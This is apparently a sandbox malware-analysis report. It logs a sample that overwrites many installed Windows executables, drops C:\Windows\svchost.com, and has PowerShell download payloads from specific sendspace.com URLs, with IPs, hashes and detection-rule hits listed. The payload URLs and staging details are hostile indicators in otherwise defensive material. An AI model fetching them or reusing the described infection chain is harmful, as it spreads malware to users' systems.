Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: Joe Sandbox View | IP Address: 69.31.136.17
Source: Joe Sandbox View | IP Address: 172.67.170.105
Source: Joe Sandbox View | IP Address: 69.31.136.57
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /pro/dl/wlorhs HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: www.sendspace.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /dlpro/90cd9178b57ca9e755cc53ffd63d0a44/664f9440/wlorhs/Undertaker.pcx HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: fs03n2.sendspace.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /pro/dl/g1h76h HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: www.sendspace.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJScPuYqxiGHOFrHH77.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Cache-Control: no-cache | Host: fs13n4.sendspace.com | Connection: Keep-Alive | Cookie: SID=7snc8sd5begfi8v3gnpjgpo9j3
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: www.sendspace.com
Source: global traffic | DNS traffic detected: DNS query: fs03n2.sendspace.com
Source: global traffic | DNS traffic detected: DNS query: fs13n4.sendspace.com
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: powershell.exe, 00000005.00000002.1992900389.0000000007948000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: java.exe0.8.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B692E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fs03n2.sendspace.com
Source: wab.exe, 00000008.00000002.2390087315.0000000021CF0000.00000004.00000010.00020000.00000000.sdmp, Uninstall.exe.8.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2169302600.000001E2C4BB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr | String found in binary or memory: http://ocsp.digicert.com0
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr | String found in binary or memory: http://ocsp.digicert.com0A
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr | String found in binary or memory: http://ocsp.digicert.com0X
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 00000005.00000002.1984224760.000000000521B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B4B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1984224760.00000000050C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: powershell.exe, 00000005.00000002.1984224760.000000000521B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Au3Info_x64.exe.8.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/
Source: Au3Info_x64.exe.8.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/8
Source: AutoIt3_x64.exe.8.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr | String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B68F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sendspace.com
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B4B41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.1984224760.00000000050C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lBfq
Source: powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B691B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs03n2.sendspaX
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B691B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B4FD4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs03n2.sendspace.com
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B68F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B691B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B4FD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B4FD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B6917000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs03n2.sendspace.com/dlpro/90cd9178b57ca9e755cc53ffd63d0a44/664f9440/wlorhs/Undertaker.pcx
Source: wab.exe, 00000008.00000002.2375969322.00000000062EC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1946722033.00000000062F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1934006716.00000000062F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1946764965.00000000062F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fs13n4.sendspace.com/
Source: wab.exe, 00000008.00000003.1934006716.00000000062F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fs13n4.sendspace.com/ace.com/dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJ
Source: wab.exe, 00000008.00000003.1934006716.00000000062F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2375969322.00000000062E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1946764965.00000000062F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fs13n4.sendspace.com/dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJScPuYqxi
Source: powershell.exe, 00000005.00000002.1984224760.000000000521B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
              Source: notification_click_helper.exe.8.dr, elevation_service.exe.8.dr, pwahelper.exe.8.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
              Source: notification_click_helper.exe.8.dr, elevation_service.exe.8.dr, pwahelper.exe.8.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
              Source: powershell.exe, 00000002.00000002.2059336952.000001E2B5DDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.2169302600.000001E2C4BB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.drString found in binary or memory: https://www.autoitscript.com/autoit3/
              Source: AutoIt3Help.exe.8.drString found in binary or memory: https://www.autoitscript.com/site/autoit/8
              Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.drString found in binary or memory: https://www.globalsign.com/repository/0
              Source: powershell.exe, 00000002.00000002.2059336952.000001E2B4D6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B6426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com
              Source: wab.exe, 00000008.00000002.2375969322.0000000006288000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/
              Source: wab.exe, 00000008.00000002.2375969322.00000000062C2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2389809411.0000000021530000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1934006716.00000000062F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/g1h76h
              Source: wab.exe, 00000008.00000002.2375969322.00000000062C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/g1h76hMU
              Source: powershell.exe, 00000002.00000002.2059336952.000001E2B4D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/wlorhsP
              Source: powershell.exe, 00000005.00000002.1984224760.000000000521B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/wlorhsXRwl
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.4:49739 version: TLS 1.2

              System Summary

              Source: amsi32_7844.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7596, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7844, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6465
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6489
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Windows\svchost.com
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8AAB162_2_00007FFD9B8AAB16
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8AB8C22_2_00007FFD9B8AB8C2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8A0D352_2_00007FFD9B8A0D35
              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\AutoIt3\Au3Check.exe 07FB7F6D9498BAE332E45617ACEA5CECB4186218AA8F1EB934AB2D48BA8FEB05
              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\AutoIt3\Au3Info.exe 6805AA9ADE6C02506EE0E7E4DB52927B8336BC13FA3C10D9B4525B7297A61676
              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe 4EC88EB380899460D7DF0DFC23E52CD4320306AAA2954AB78B1A5EF0CA3BD77C
              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe 2B94D13DCF7D675C9A74E92FAC2B31C4DF2F392ACE777A94C89D431979E52A89
              Source: AppVDllSurrogate.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: OcPubMgr.exe.8.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: OcPubMgr.exe.8.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: OcPubMgr.exe.8.drStatic PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
              Source: OcPubMgr.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: OcPubMgr.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: OcPubMgr.exe.8.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: officeappguardwin32.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: officeappguardwin32.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: AppVDllSurrogate32.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: AppVDllSurrogate64.exe.8.drStatic PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
              Source: OfficeScrSanBroker.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: OfficeScrSanBroker.exe.8.drStatic PE information: Resource name: RT_ICON type: 68k Blit mpx/mux executable
              Source: OfficeScrSanBroker.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: OfficeScrSanBroker.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: AppVLP.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: Integrator.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: PerfBoost.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: PerfBoost.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: MpCmdRun.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: MpDlpCmd.exe.8.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: VC_redist.x64.exe.8.drStatic PE information: Resource name: RT_ICON type: VAX-order 68K Blit (standalone) executable
              Source: integrator.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: UcMapi.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: UcMapi.exe.8.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: UcMapi.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (block device driver p\327G\200<)
              Source: ai.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: ai.exe.8.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: ai.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: ai.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: Au3Check.exe.8.drStatic PE information: Resource name: RT_GROUP_ICON type: DOS executable (COM, 0x8C-variant)
              Source: Aut2exe.exe.8.drStatic PE information: Resource name: RT_ICON type: 370 XA sysV executable not stripped - version 6657 - 5.2 format
              Source: Aut2exe_x64.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: upx.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: ai.exe0.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (block device driver \240\357E)
              Source: OLicenseHeartbeat.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: SciTE.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: Uninstall.exe.8.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: AdobeARMHelper.exe.8.drStatic PE information: Resource name: RT_ICON type: PDP-11 pure executable - version 69
              Source: AdobeARMHelper.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: AdobeARMHelper.exe.8.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: jaureg.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: jucheck.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: jucheck.exe.8.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: jusched.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: jusched.exe.8.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: grv_icons.exe.8.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: java.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: javaw.exe.8.drStatic PE information: Resource name: RT_ICON type: DitPack archive data
              Source: javaws.exe.8.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: GoogleCrashHandler.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (block device driver)
              Source: GoogleCrashHandler64.exe.8.drStatic PE information: Resource name: RT_ICON type: 386 compact demand paged pure executable not stripped
              Source: GoogleUpdateCore.exe.8.drStatic PE information: Resource name: RT_ICON type: Aarch64 COFF executable, not stripped, 66 sections, symbol offset=0x42aa70, 181 symbols, optional header size 43644, created Thu Jan 1 00:03:22 1970
              Source: GoogleUpdateCore.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: pubs.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: OcPubMgr.exe.8.drStatic PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
              Source: AppVDllSurrogate64.exe.8.drStatic PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
              Source: PerfBoost.exe.8.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: MpCmdRun.exe0.8.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: misc.exe.8.drStatic PE information: Resource name: RT_ICON type: MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "\353\200"
              Source: misc.exe.8.drStatic PE information: Resource name: RT_ICON type: MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "\353\377"
              Source: pj11icon.exe.8.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_MSB_FIRST
              Source: SQLDumper.exe.8.drStatic PE information: Data appended to the last section found
              Source: AdobeARMHelper.exe.8.drStatic PE information: Data appended to the last section found
              Source: AppSharingHookController64.exe.8.drStatic PE information: Data appended to the last section found
              Source: GoogleUpdateCore.exe.8.drStatic PE information: Data appended to the last section found
              Source: AppVDllSurrogate.exe.8.drStatic PE information: Data appended to the last section found
              Source: dbcicons.exe.8.drStatic PE information: Data appended to the last section found
              Source: AppVDllSurrogate64.exe.8.drStatic PE information: Data appended to the last section found
              Source: osmclienticon.exe.8.drStatic PE information: Data appended to the last section found
              Source: msoev.exe.8.drStatic PE information: Data appended to the last section found
              Source: GoogleUpdate.exe.8.drStatic PE information: Data appended to the last section found
              Source: javaw.exe.8.drStatic PE information: Data appended to the last section found
              Source: MsMpEng.exe.8.drStatic PE information: Data appended to the last section found
              Source: Au3Info.exe.8.drStatic PE information: Data appended to the last section found
              Source: aimgr.exe.8.drStatic PE information: Data appended to the last section found
              Source: GoogleUpdateBroker.exe.8.drStatic PE information: Data appended to the last section found
              Source: Au3Info_x64.exe.8.drStatic PE information: Data appended to the last section found
              Source: PerfBoost.exe.8.drStatic PE information: Data appended to the last section found
              Source: javaws.exe.8.drStatic PE information: Data appended to the last section found
              Source: aimgr.exe0.8.drStatic PE information: Data appended to the last section found
              Source: Common.DBConnection.exe.8.drStatic PE information: Data appended to the last section found
              Source: GoogleUpdateOnDemand.exe.8.drStatic PE information: Data appended to the last section found
              Source: SDXHelper.exe.8.drStatic PE information: Data appended to the last section found
              Source: upx.exe.8.drStatic PE information: Data appended to the last section found
              Source: Au3Check.exe.8.drStatic PE information: Data appended to the last section found
              Source: GoogleCrashHandler.exe.8.drStatic PE information: Data appended to the last section found
              Source: sscicons.exe.8.drStatic PE information: Data appended to the last section found
              Source: armsvc.exe.8.drStatic PE information: Data appended to the last section found
              Source: AppVLP.exe.8.drStatic PE information: Data appended to the last section found
              Source: GoogleCrashHandler64.exe.8.drStatic PE information: Data appended to the last section found
              Source: Microsoft.Mashup.Container.Loader.exe.8.drStatic PE information: Data appended to the last section found
              Source: AppSharingHookController.exe.8.drStatic PE information: Data appended to the last section found
              Source: AutoIt3Help.exe.8.drStatic PE information: Data appended to the last section found
              Source: Uninstall.exe.8.drStatic PE information: Data appended to the last section found
              Source: AppVDllSurrogate32.exe.8.drStatic PE information: Data appended to the last section found
              Source: Wordconv.exe.8.drStatic PE information: Data appended to the last section found
              Source: chrome.exe.8.drStatic PE information: Data appended to the last section found
              Source: VSTOInstaller.exe.8.drStatic PE information: Data appended to the last section found
              Source: MpDlpCmd.exe.8.drStatic PE information: Data appended to the last section found
              Source: java.exe.8.drStatic PE information: Data appended to the last section found
              Source: MpCopyAccelerator.exe.8.drStatic PE information: Data appended to the last section found
